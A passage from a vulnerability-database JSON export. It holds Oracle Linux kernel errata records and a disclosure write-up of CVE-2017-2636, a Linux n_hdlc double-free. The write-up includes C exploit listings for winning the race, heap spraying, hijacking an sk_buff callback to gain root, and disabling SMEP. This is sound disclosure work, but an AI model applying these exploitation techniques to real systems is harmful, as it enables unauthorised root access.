"kernel-uek-firmware-4.1.12-61.1.25.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.25.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-4.1.12-61.1.25.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.25.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-4.1.12-61.1.25.el7uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.25.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-4.1.12-61.1.25.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.5.3-2.el6", "arch": "x86_64", "packageFilename": "dtrace-modules-4.1.12-61.1.25.el6uek-0.5.3-2.el6.x86_64.rpm", "packageName": "dtrace-modules-4.1.12-61.1.25.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.5.3-2.el7", "arch": "src", "packageFilename": "dtrace-modules-4.1.12-61.1.25.el7uek-0.5.3-2.el7.src.rpm", "packageName": "dtrace-modules-4.1.12-61.1.25.el7uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.25.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-4.1.12-61.1.25.el7uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.25.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-4.1.12-61.1.25.el7uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.25.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-4.1.12-61.1.25.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}], "description": "kernel-uek\n[4.1.12-61.1.25]\n- KEYS: Fix short sprintf buffer in /proc/keys show function (David Howells) [Orabug: 25306361] {CVE-2016-7042}\n- nvme: Limit command retries (Keith Busch) [Orabug: 25374751] \n- fs/proc/task_mmu.c: fix mm_access() mode parameter in pagemap_read() (Kenny Keslar) [Orabug: 25374977] \n- tcp: fix use after free in tcp_xmit_retransmit_queue() (Eric Dumazet) [Orabug: 25374364] {CVE-2016-6828}\n- tunnels: Don't apply GRO to multiple layers of encapsulation. (Jesse Gross) [Orabug: 25036352] {CVE-2016-8666}\n- i40e: Don't notify client(s) for DCB changes on all VSIs (Neerav Parikh) [Orabug: 25046290] \n- packet: fix race condition in packet_set_ring (Philip Pettersson) [Orabug: 25231617] {CVE-2016-8655}\n- netlink: Fix dump skb leak/double free (Herbert Xu) [Orabug: 25231692] {CVE-2016-9806}\n- ALSA: pcm : Call kill_fasync() in stream lock (Takashi Iwai) [Orabug: 25231720] {CVE-2016-9794}\n- net: avoid signed overflows for SO_{SND|RCV}BUFFORCE (Eric Dumazet) [Orabug: 25231751] {CVE-2016-9793}\n[4.1.12-61.1.24]\n- rebuild bumping release", "edition": 3, "reporter": "Oracle", "published": "2017-01-12T00:00:00", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-9806", "CVE-2016-9794", "CVE-2016-8655", "CVE-2016-9793", "CVE-2016-8666", "CVE-2016-6828", "CVE-2016-7042"], "modified": "2017-01-12T00:00:00", "id": "ELSA-2017-3508", "href": "http://linux.oracle.com/errata/ELSA-2017-3508.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:41:18", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-103.10.1.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-4.1.12-103.10.1.el7uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-103.10.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-4.1.12-103.10.1.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-103.10.1.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-4.1.12-103.10.1.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-103.10.1.el6uek", "arch": "src", "packageFilename": "kernel-uek-4.1.12-103.10.1.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-103.10.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-4.1.12-103.10.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-103.10.1.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-4.1.12-103.10.1.el7uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-103.10.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-4.1.12-103.10.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-103.10.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-4.1.12-103.10.1.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-103.10.1.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-4.1.12-103.10.1.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-103.10.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-4.1.12-103.10.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-103.10.1.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-4.1.12-103.10.1.el7uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-103.10.1.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-4.1.12-103.10.1.el7uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-103.10.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-4.1.12-103.10.1.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-103.10.1.el7uek", "arch": "src", "packageFilename": "kernel-uek-4.1.12-103.10.1.el7uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}], "description": "[4.1.12-103.10.1]\n- mm, thp: Do not make page table dirty unconditionally in follow_trans_huge_pmd() (Kirill A. Shutemov) [Orabug: 27200879] {CVE-2017-1000405}\n- NFS: Add static NFS I/O tracepoints (Chuck Lever) \n- storvsc: dont assume SG list is contiguous (Aruna Ramakrishna) [Orabug: 27044692] \n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly Mayatskikh) [Orabug: 27069038] {CVE-2017-12190}\n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069038] {CVE-2017-12190}\n- packet: in packet_do_bind, test fanout with bind_lock held (Willem de Bruijn) [Orabug: 27069065] {CVE-2017-15649}\n- packet: hold bind lock when rebinding to fanout hook (Willem de Bruijn) [Orabug: 27069065] {CVE-2017-15649}\n- net: convert packet_fanout.sk_ref from atomic_t to refcount_t (Reshetova, Elena) [Orabug: 27069065] {CVE-2017-15649}\n- packet: fix races in fanout_add() (Eric Dumazet) [Orabug: 27069065] {CVE-2017-15649}\n- refcount_t: Introduce a special purpose refcount type (Peter Zijlstra) [Orabug: 27069065] {CVE-2017-15649}\n- locking/atomics: Add _{acquire|release|relaxed}() variants of some atomic operations (Will Deacon) [Orabug: 27069065] {CVE-2017-15649}\n- net: qmi_wwan: fix divide by 0 on bad descriptors (Bjorn Mork) [Orabug: 27215225] {CVE-2017-16650}\n- ALSA: usb-audio: Kill stray URB at exiting (Takashi Iwai) [Orabug: 27148276] {CVE-2017-16527}\n- scsi: Add STARGET_CREATED_REMOVE state to scsi_target_state (Ewan D. Milne) [Orabug: 27187217] \n- ocfs2: fix posix_acl_create deadlock (Junxiao Bi) [Orabug: 27126129] \n- scsi: Dont abort scsi_scan due to unexpected response (John Sobecki) [Orabug: 27119628] \n- ocfs2: code clean up for direct io (Ryan Ding) \n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27076919] \n- KVM: nVMX: Fix loss of L2s NMI blocking state (Wanpeng Li) [Orabug: 27062498] \n- KVM: nVMX: track NMI blocking state separately for each VMCS (Paolo Bonzini) [Orabug: 27062498] \n- KVM: VMX: require virtual NMI support (Paolo Bonzini) [Orabug: 27062498] \n- KVM: nVMX: Fix the NMI IDT-vectoring handling (Wanpeng Li) [Orabug: 27062498] \n- uek-rpm: disable CONFIG_NUMA_BALANCING_DEFAULT_ENABLED (Fred Herard) [Orabug: 26798697] \n- thp: run vma_adjust_trans_huge() outside i_mmap_rwsem (Kirill A. Shutemov) [Orabug: 27026180] \n- selinux: fix off-by-one in setprocattr (Stephen Smalley) [Orabug: 27001717] {CVE-2017-2618} {CVE-2017-2618} {CVE-2017-2618}\n- sysctl: Drop reference added by grab_header in proc_sys_readdir (Zhou Chengming) [Orabug: 27036903] {CVE-2016-9191} {CVE-2016-9191} {CVE-2016-9191}\n- KEYS: prevent KEYCTL_READ on negative key (Eric Biggers) [Orabug: 27050248] {CVE-2017-12192}\n- IB/ipoib: For sendonly join free the multicast group on leave (Christoph Lameter) [Orabug: 27077718] \n- IB/ipoib: increase the max mcast backlog queue (Doug Ledford) [Orabug: 27077718] \n- IB/ipoib: Make sendonly multicast joins create the mcast group (Doug Ledford) [Orabug: 27077718] \n- IB/ipoib: Expire sendonly multicast joins (Christoph Lameter) [Orabug: 27077718] \n- IB/ipoib: Suppress warning for send only join failures (Jason Gunthorpe) [Orabug: 27077718] \n- IB/ipoib: Clean up send-only multicast joins (Doug Ledford) [Orabug: 27077718] \n- netlink: allow to listen 'all' netns (Nicolas Dichtel) [Orabug: 27077944] \n- netlink: rename private flags and states (Nicolas Dichtel) [Orabug: 27077944] \n- netns: use a spin_lock to protect nsid management (Nicolas Dichtel) [Orabug: 27077944] \n- netns: notify new nsid outside __peernet2id() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: rename peernet2id() to peernet2id_alloc() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: always provide the id to rtnl_net_fill() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: returns always an id in __peernet2id() (Nicolas Dichtel) [Orabug: 27077944] \n- Hang/soft lockup in d_invalidate with simultaneous calls (Al Viro) [Orabug: 27052681] \n- Revert 'drivers/char/mem.c: deny access in open operation when securelevel is set' (Brian Maly) [Orabug: 27037811]", "edition": 3, "reporter": "Oracle", "published": "2017-12-07T00:00:00", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-9191", "CVE-2017-15649", "CVE-2017-16527", "CVE-2017-12192", "CVE-2017-16650", "CVE-2017-2618", "CVE-2017-1000405", "CVE-2017-12190"], "modified": "2017-12-07T00:00:00", "id": "ELSA-2017-3651", "href": "http://linux.oracle.com/errata/ELSA-2017-3651.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:01:12", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "This article discloses the exploitation of [CVE-2017-2636](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2636), which is a race condition in the `n_hdlc` Linux kernel driver (`drivers/tty/n_hdlc.c`). The described exploit gains root privileges bypassing Supervisor Mode Execution Protection (SMEP).\r\n\r\nThis driver provides `HDLC` serial line discipline and comes as a kernel module in many Linux distributions, which have `CONFIG_N_HDLC=m` in the kernel config. So [RHEL 6/7](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2636), [Fedora](https://bugzilla.redhat.com/show_bug.cgi?id=1430049), [SUSE](https://bugzilla.novell.com/show_bug.cgi?id=CVE-2017-2636), [Debian](https://security-tracker.debian.org/tracker/CVE-2017-2636), and [Ubuntu](https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-2636.html) were affected by CVE-2017-2636.\r\n\r\nCurrently the flaw is [fixed](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=82f2341c94d270421f383641b7cd670e474db56b) in the mainline Linux kernel ([public disclosure](http://seclists.org/oss-sec/2017/q1/569)). The bug was [introduced](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=be10eb7589337e5defbe214dae038a53dd21add8) quite a long time ago, so the patch is backported to the stable kernel versions too.\r\n\r\nI've managed to make the proof-of-concept exploit quite stable and fast. It crashes the kernel very rarely and gains the root shell in less than 20 seconds (at least on my machines). This PoC defeats SMEP, but doesn't cope with Supervisor Mode Access Prevention (SMAP), although it is possible with some additional efforts.\r\n\r\nMy PoC also doesn't defeat Kernel Address Space Layout Randomization (KASLR) and needs to know the kernel code offset. This offset can be obtained using a kernel pointer leak or the prefetch side-channel [attack](https://gruss.cc/files/prefetch.pdf) (see xairy's [implementation](https://github.com/xairy/kaslr-bypass-via-prefetch)).\r\n\r\nFirst of all let's watch the [demo video](https://youtu.be/nDCvRxWxN0Y)!\r\n\r\n\r\n## The n_hdlc bug\r\n\r\nInitially, `N_HDLC` line discipline used a self-made singly linked list for data buffers and had `n_hdlc.tbuf` pointer for buffer retransmitting after an error. It worked, but the commit `be10eb75893` added data flushing and introduced racy access to `n_hdlc.tbuf`.\r\n\r\nAfter tx error concurrent [`flush_tx_queue()`](http://lxr.free-electrons.com/ident?i=flush_tx_queue) and [`n_hdlc_send_frames()`](http://lxr.free-electrons.com/ident?i=n_hdlc_send_frames) both use `n_hdlc.tbuf` and can put one buffer to `tx_free_buf_list` twice. That causes an exploitable double-free error in [`n_hdlc_release()`](http://lxr.free-electrons.com/ident?i=n_hdlc_release). The data buffers are represented by `struct n_hdlc_buf` and allocated in the `kmalloc-8192` slab cache.\r\n\r\nFor fixing this bug, I [used](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=82f2341c94d270421f383641b7cd670e474db56b) a standard kernel linked list and got rid of racy `n_hdlc.tbuf`: in case of tx error the current `n_hdlc_buf` item is put after the head of `tx_buf_list`.\r\n\r\nI started the investigation when got a suspicious kernel crash from [syzkaller](https://github.com/google/syzkaller). It is a really great project, which helped to fix an [impressively big list](https://github.com/google/syzkaller/wiki/Found-Bugs) of bugs in Linux kernel.\r\n\r\n## Exploitation\r\n\r\nThis article is the only way for me to publish the exploit code. So, please, be patient and prepare to plenty of listings!\r\n\r\n### Winning the race\r\n\r\nLet's look to the code of the main loop: going to race till success.\r\n\r\n```\r\nfor (;;) {\r\n\tlong tmo1 = 0;\r\n\tlong tmo2 = 0;\r\n\r\n\tif (loop % 2 == 0)\r\n\t\ttmo1 = loop % MAX_RACE_LAG_USEC;\r\n\telse\r\n\t\ttmo2 = loop % MAX_RACE_LAG_USEC;\r\n```\r\n\r\nThe `loop` counter is incremented every iteration, so `tmo1` and `tmo2` variables are changing too. They are used for making lags in the racing threads, which:\r\n\r\n1. synchronize at the `pthread_barrier`,\r\n2. spin the specified number of microseconds in a busy loop,\r\n3. interact with `n_hdlc`.\r\n\r\nSuch a way of colliding threads helps to hit the race condition earlier.\r\n\r\n```\r\n\tptmd = open(\"/dev/ptmx\", O_RDWR);\r\n\tif (ptmd < 0) {\r\n\t\tperror(\"[-] open /dev/ptmx\");\r\n\t\tgoto end;\r\n\t}\r\n\r\n\tret = ioctl(ptmd, TIOCSETD, &ldisc);\r\n\tif (ret < 0) {\r\n\t\tperror(\"[-] TIOCSETD\");\r\n\t\tgoto end;\r\n\t}\r\n```\r\n\r\nHere we open a pseudoterminal master and slave pair and set the `N_HDLC` line discipline for it. For more information about that, see `man ptmx`, [`Documentation/serial/tty.txt`](http://lxr.free-electrons.com/source/Documentation/serial/tty.txt) and [this](https://unix.stackexchange.com/questions/117981/what-are-the-responsibilities-of-each-pseudo-terminal-pty-component-software) great discussion about `pty` components.\r\n\r\nSetting `N_HDLC` ldisc for a serial line causes the `n_hdlc` kernel module autoloading. You can get the same effect using `ldattach` daemon.\r\n\r\n```\r\n\tret = ioctl(ptmd, TCXONC, TCOOFF);\r\n\tif (ret < 0) {\r\n\t\tperror(\"[-] TCXONC TCOOFF\");\r\n\t\tgoto end;\r\n\t}\r\n\r\n\tbytes = write(ptmd, buf, TTY_BUF_SZ);\r\n\tif (bytes != TTY_BUF_SZ) {\r\n\t\tprintf(\"[-] write to ptmx (bytes)\\n\");\r\n\t\tgoto end;\r\n\t}\r\n```\r\n\r\nHere we suspend the pseudoterminal output (see `man tty_ioctl`) and write one data buffer. The `n_hdlc_send_frames()` fails to send this buffer and saves its address in `n_hdlc.tbuf`.\r\n\r\nWe are ready for the race. Start two threads, which are allowed to run on all available CPU cores:\r\n\r\n* thread 1: flush the data with `ioctl(ptmd, TCFLSH, TCIOFLUSH)`;\r\n* thread 2: start the suspended output with `ioctl(ptmd, TCXONC, TCOON)`.\r\n\r\nIn a lucky case, they both put the only written buffer pointed by `n_hdlc.tbuf` to `tx_free_buf_list`.\r\n\r\nNow we return to the CPU 0 and trigger possible double-free error:\r\n\r\n```\r\n\tret = sched_setaffinity(0, sizeof(single_cpu), &single_cpu);\r\n\tif (ret != 0) {\r\n\t\tperror(\"[-] sched_setaffinity\");\r\n\t\tgoto end;\r\n\t}\r\n\r\n\tret = close(ptmd);\r\n\tif (ret != 0) {\r\n\t\tperror(\"[-] close /dev/ptmx\");\r\n\t\tgoto end;\r\n\t}\r\n```\r\n\r\nWe close the pseudoterminal master. The `n_hdlc_release()` goes through `n_hdlc_buf_list` items and frees the kernel memory used for data buffers. Here the possible double-free error happens.\r\n\r\nThis particular bug is successfully detected by the Kernel Address Sanitizer ([KASAN](https://lwn.net/Articles/612153/)), which reports the use-after-free happening just before the second `kfree()`.\r\n\r\nThe final part of the main loop:\r\n\r\n```\r\n\tret = exploit_skb(socks, sockaddrs, payload, loop % SOCK_PAIRS);\r\n\tif (ret != EXIT_SUCCESS)\r\n\t\tgoto end;\r\n\r\n\tif (getuid() == 0 && geteuid() == 0) {\r\n\t\tprintf(\"[+] race #%ld: WIN! flush(%ld), TCOON(%ld)\\n\",\r\n\t\t\t\t\t\tloop, tmo1, tmo2);\r\n\t\tbreak; /* :) */\r\n\t}\r\n\r\n\tloop++;\r\n}\r\n\r\nprintf(\"[+] finish as: uid=0, euid=0, start sh...\\n\");\r\nrun_sh();\r\n```\r\n\r\nHere we try to exploit the double-free error by overwriting `struct sk_buff`. In case of success, we exit from the main loop and run the root shell in the child process using `execve()`.\r\n\r\n### Exploiting the sk_buff\r\n\r\nAs I mentioned, the doubly freed `n_hdlc_buf` item is allocated in the `kmalloc-8192` slab cache. For exploiting double-free error for this cache, we need some kernel objects with the size a bit less than 8 kB. Actually, we need two types of such objects:\r\n\r\n* one containing some function pointer,\r\n* another one with the controllable payload, which can overwrite that pointer.\r\n\r\nSearching for such kernel objects and experimenting with them was not easy and took me some time. Finally, I've chosen `sk_buff` with its `destructor_arg` in `struct skb_shared_info`. This approach is not new \u2013 consider reading the cool write-up about [CVE-2016-2384](https://xairy.github.io/blog/2016/cve-2016-2384).\r\n\r\nThe network-related buffers in Linux kernel are represented by `struct sk_buff`. See [these](http://vger.kernel.org/~davem/skb_data.html) great pictures describing `sk_buff` data layout. The most important for us is that the network data and `skb_shared_info` are placed in the same kernel memory block pointed by `sk_buff.head`. So creating a 7500-byte network packet in the userspace will make `skb_shared_info` be allocated in the `kmalloc-8192` slab cache. Exactly like we want.\r\n\r\nBut there is one challenge: `n_hdlc_release()` frees 13 `n_hdlc_buf` items straight away. At first I was trying to do the heap spray in parallel with `n_hdlc_release()`, but didn't manage to inject the corresponding `kmalloc()` between the needed `kfree()` calls. So I used another way: spraying **after** `n_hdlc_release()` can give two `sk_buff` items with the `head` pointing to the same memory. That's promising.\r\n\r\nSo we need to spray hard but keep 8 kB UDP packets allocated to avoid mess in the allocator freelist. Socket queues are limited in size, so I've created a lot of sockets using `socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)`:\r\n\r\n* one client socket for sending UDP packets,\r\n* one dedicated server socket, which is likely to receive two packets with the same `sk_buff.head`,\r\n* 200 server sockets for receiving other packets emitted during heap spray,\r\n* 200 server sockets for receiving the packets emitted during slab exhaustion.\r\n\r\nOk. Now we need another kernel object for overwriting the function pointer in `skb_shared_info.destructor_arg`. We can't use `sk_buff.head` for that again, because `skb_shared_info` is placed at the same offset in `sk_buff.head` and we don't control it. I was really happy to find that `add_key` syscall is able to allocate the controllable data in the `kmalloc-8192` too.\r\n\r\nBut I became upset when encountered key data quotas in `/proc/sys/kernel/keys/` owned by root. The default value of `/proc/sys/kernel/keys/maxbytes` is 20000\\. It means that only 2 `add_key` syscalls can concurrently store our 8 kB payload in the kernel memory, and that's not enough.\r\n\r\nBut the happiness returned when I encountered the bright idea at the [slides](https://speakerdeck.com/retme7/talk-is-cheap-show-me-the-code) of Di Shen from [Keen Security Lab](http://keenlab.tencent.com/en/): I can make the heap spray successful even if `add_key` fails!\r\n\r\nSo, let's look at the `init_payload()` code:\r\n\r\n```\r\n#define MMAP_ADDR\t\t0x10000lu\r\n#define PAYLOAD_SZ\t\t8100\r\n#define SKB_END_OFFSET\t\t7872\r\n#define KEY_DATA_OFFSET\t\t18\r\n\r\nint init_payload(char *p)\r\n{\r\n\tstruct skb_shared_info *info = (struct skb_shared_info *)(p +\r\n\t\t\t\t\tSKB_END_OFFSET - KEY_DATA_OFFSET);\r\n\tstruct ubuf_info *uinfo_p = NULL;\r\n```\r\n\r\nThe definition of `struct skb_shared_info` and `struct ubuf_info` is copied to the exploit code from [`include/linux/skbuff.h`](http://lxr.free-electrons.com/source/include/linux/skbuff.h) kernel header.\r\n\r\nThe payload buffer will be passed to `add_key` as a parameter, and the data which we put there at `7872 - 18 = 7854` byte offset will exactly overwrite `skb_shared_info`.\r\n\r\n```\r\n\tchar *area = NULL;\r\n\tvoid *target_addr = (void *)(MMAP_ADDR);\r\n\r\n\tarea = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE,\r\n\t\t\tMAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n\tif (area != target_addr) {\r\n\t\tperror(\"[-] mmap\\n\");\r\n\t\treturn EXIT_FAILURE;\r\n\t}\r\n\r\n\tuinfo_p = target_addr;\r\n\tuinfo_p->callback = (uint64_t)root_it;\r\n\r\n\tinfo->destructor_arg = (uint64_t)uinfo_p;\r\n\tinfo->tx_flags = SKBTX_DEV_ZEROCOPY;\r\n```\r\n\r\nThe `ubuf_info.callback` is called in [`skb_release_data()`](http://lxr.free-electrons.com/ident?i=skb_release_data) if `skb_shared_info.tx_flags` has `SKBTX_DEV_ZEROCOPY` flag set to 1\\. In our case, `ubuf_info` item resides in the userspace memory, so dereferencing its pointer in the kernelspace will be detected by SMAP.\r\n\r\nAnyway, now the `callback` points to `root_it()`, which does the classical `commit_creds(prepare_kernel_cred(0))`. However, this shellcode resides in the userspace too, so executing it in the kernelspace will be detected by SMEP. We are going to bypass it soon.\r\n\r\n#### Heap spraying and stabilization\r\n\r\nAs I mentioned, `n_hdlc_release()` frees thirteen `n_hdlc_buf` items. Our `exploit_skb()` is executed shortly after that. Here we do the actual heap spraying by sending twenty 7500-byte UDP packets. Experiments showed that the packets number 12, 13, 14, and 15 are likely to be exploitable, so they are sent to the dedicated server socket.\r\n\r\nNow we are going to perform the use-after-free on `sk_buff.data`:\r\n\r\n* receive 4 network packets on the dedicated server socket one by one,\r\n* execute several `add_key` syscalls with our payload after receiving each of them.\r\n\r\nThe exact number of `add_key` syscalls giving the best results was found empirically by testing the exploit many times. The example of `add_key` call:\r\n\r\n\r\n\r\n```\r\nk[0] = syscall(__NR_add_key, \"user\", \"payload0\",\r\n\t\t\tpayload, PAYLOAD_SZ, KEY_SPEC_PROCESS_KEYRING);\r\n```\r\n\r\n\r\nIf we won the race and did the heap spraying luckily, then our shellcode is executed when the poisoned packet is received. After that we can invalidate the keys that were successfully allocated in the kernel memory:\r\n\r\n```\r\nfor (i = 0; i < KEYS_N; i++) {\r\n\tif (k[i] > 0)\r\n\t\tsyscall(__NR_keyctl, KEYCTL_INVALIDATE, k[i]);\r\n}\r\n```\r\n\r\nNow we need to prepare the heap to the next round of `n_hdlc` racing. The `/proc/slabinfo` shows that `kmalloc-8192` slab stores only 4 objects, so double-free error has high chances to crash the allocator. But the following trick helps to avoid that and makes the exploit much more stable \u2013 send a dozen UDP packets to fill the partially emptied slabs.\r\n\r\n### SMEP bypass\r\n\r\nAs I mentioned, the `root_it()` shellcode resides in the userspace. Executing it in the kernelspace is detected by [SMEP](http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-linux/) (Supervisor Mode Execution Protection). It is an x86 feature, which is enabled by toggling the bit 20 of CR4 register.\r\n\r\nThere are several approaches to defeat it, for example, Vitaly Nikolenko [describes](https://www.syscan360.org/slides/2016_SG_Vitaly_Nikolenko_Practical_SMEP_Bypass_Techniques.pdf) how to switch off SMEP using stack pivoting ROP technique. It works great, but I didn't want to copy it blindly. So I've created another quite funny way to defeat SMEP without ROP. Please inform me if that approach is already known.\r\n\r\nIn [`arch/x86/include/asm/special_insns.h`](http://lxr.free-electrons.com/source/arch/x86/include/asm/special_insns.h) I've found this function:\r\n\r\n\r\n\r\n```\r\nstatic inline void native_write_cr4(unsigned long val)\r\n{\r\n\tprintk(\"wcr4: 0x%lx\\n\", val);\r\n\tasm volatile(\"mov %0,%%cr4\": : \"r\" (val), \"m\" (__force_order));\r\n}\r\n```\r\n\r\n\r\n\r\nIt writes its first argument to CR4.\r\n\r\nNow let's look at `skb_release_data()`, which executes the hijacked `callback` in the Ring 0:\r\n\r\n\r\n```\r\n\tif (shinfo->tx_flags & SKBTX_DEV_ZEROCOPY) {\r\n\t\tstruct ubuf_info *uarg;\r\n\r\n\t\tuarg = shinfo->destructor_arg;\r\n\t\tif (uarg->callback)\r\n\t\t\tuarg->callback(uarg, true);\r\n\t}\r\n```\r\n\r\n\r\nWe see that the destructor `callback` takes `uarg` address as the first argument. And we control this address in the exploited `sk_buff`.\r\n\r\nSo I've decided to write the address of `native_write_cr4()` to `ubuf_info.callback` and put `ubuf_info` item at the mmap'ed userspace address `0x406e0`, which is the correct value of CR4 with disabled SMEP.\r\n\r\nIn that case SMEP is disabled on one CPU core without any ROP. However, now we need to win the race twice: first time to disable SMEP, second time to execute the shellcode. But it's not a problem for this particular exploit since it is fast and reliable.\r\n\r\nSo let's initialize the payload a bit differently:\r\n\r\n```\r\n\t#define CR4_VAL\t0x406e0lu\r\n\r\n\tvoid *target_addr = (void *)(CR4_VAL & 0xfffff000lu);\r\n\r\n\tarea = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE,\r\n\t\t\tMAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n\tif (area != target_addr) {\r\n\t\tperror(\"[-] mmap\\n\");\r\n\t\treturn EXIT_FAILURE;\r\n\t}\r\n\r\n\tuinfo_p = (struct ubuf_info *)CR4_VAL;\r\n\tuinfo_p->callback = NATIVE_WRITE_CR4;\r\n\r\n\tinfo->destructor_arg = (uint64_t)uinfo_p;\r\n\tinfo->tx_flags = SKBTX_DEV_ZEROCOPY;\r\n```\r\n\r\n\r\nThat SMEP bypass looks witty, but introduces one additional requirement - it needs bit 18 (OSXSAVE) of CR4 set to 1\\. Otherwise `target_addr` becomes 0 and `mmap()` fails, since mapping the zero page is not allowed.\r\n\r\n## Conclusion\r\n\r\nInvestigating of `CVE-2017-2636` and writing this article was a big fun for me. I want to thank [Positive Technologies](https://www.ptsecurity.com/ww-en/) for giving me the opportunity to work on this research. I would really appreciate feedback. See my contacts below.", "reporter": "Root", "published": "2017-03-09T00:00:00", "type": "seebug", "title": "Linux kernel local privilege escalation flaw in n_hdlc\uff08CVE-2017-2636\uff09", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2384", "CVE-2017-2636"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2017-03-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92755", "id": "SSV:92755", "sourceData": "", "cvss": 